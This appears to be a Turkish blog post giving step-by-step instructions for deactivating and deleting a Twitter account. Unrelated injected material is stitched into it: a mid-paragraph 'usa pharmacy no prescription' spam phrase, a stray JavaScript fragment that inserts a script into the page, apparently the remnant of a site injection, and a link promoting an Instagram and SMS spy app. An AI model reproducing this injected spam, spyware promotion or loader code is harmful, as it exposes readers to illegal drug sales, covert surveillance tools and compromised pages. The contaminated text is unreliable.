Twitter Hesabını Nasıl Silebilirim ?

twitterSosyal ağ siteleri arasında en çok ziyaret edilen siteler arasında yer alan Twitter, Türkiye’de de geniş bir kullanıcı kitlesine sahiptir.

Twitter Hesabını Kapatma

Kullanıcılar tarafından oldukça çok tercih edilen Twitter’da kullanıcılar çeşitli sorunlar yaşayabilmektedirler. Genellikle kullanıcıların büyük bir çoğunluğu gizlilik, güvenlik, kötü kullanım vb. nedenlerden dolayı hesaplarını kapatmak hatta bununlada yetinmeyerek silmek istemektedirler. Bu yazımızda sizlere Twitter hesaplarımızı nasıl silebileceğinizi ve kapatabileceğinizi anlatacağız. Twitter hesabınızı silmek için profilinize masaüstü veya dizüstü bilgisayardan giriş yapmanız gerekmektedir. Cep telefonlarından Twitter hesap silme işlemlerini kabul etmemektedir. usa pharmacy no prescription

Twitter Hesap Kapatma ve Silme Linki : https://twitter.com/settings/accounts/confirm_deactivation

Yukarıda bulunan linke tıkladıktan sonra kullanıcı adı ve şifrenizi girin. Hesap silme işlemini onayladıktan sonra hesabınız 30 gün boyunca kapalı kalacaktır. 30 gün boyunca hesabınıza giriş yapmadığınız takdirde kalıcı olarak silinme işlemi gerçekleşecektir. Hesabınız silindikten sonra bilgilerinizi geri getirmeniz mümkün değildir. Bu arada unutmadan twitter kullanıcı adını değiştirmek için hesabınızı silmenize gerek yoktur.

Yukarıda bulunan hesap silme linkini kullanarak hesabınızı silmek istemiyorsanız bu işlemi manuel olarak da yapabilirsiniz. Öncelikle masaüstü ya da dizüstü bilgisayardan Twitter hesabınıza giriş yapın ve profil ayarları kısmına tıklayın. Karşınıza gelen sayfanın en altında bulunan “hesabımı devre dışı bırak.” bağlantı butonuna tıklayın. Hesabınızı silmeden önce size yapılan bilgilendirmeleri dikkatlice okuyun. Ardından devre dışı bırak butonuna tıklayın ve böylece hesabınız yine aynı şekilde kapatılmış olacak.

document.currentScript.parentNode.insertBefore(s, document.currentScript);http://marijanlaw.com/instagram-spy-xnore-spy-app-sms-tracker/

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir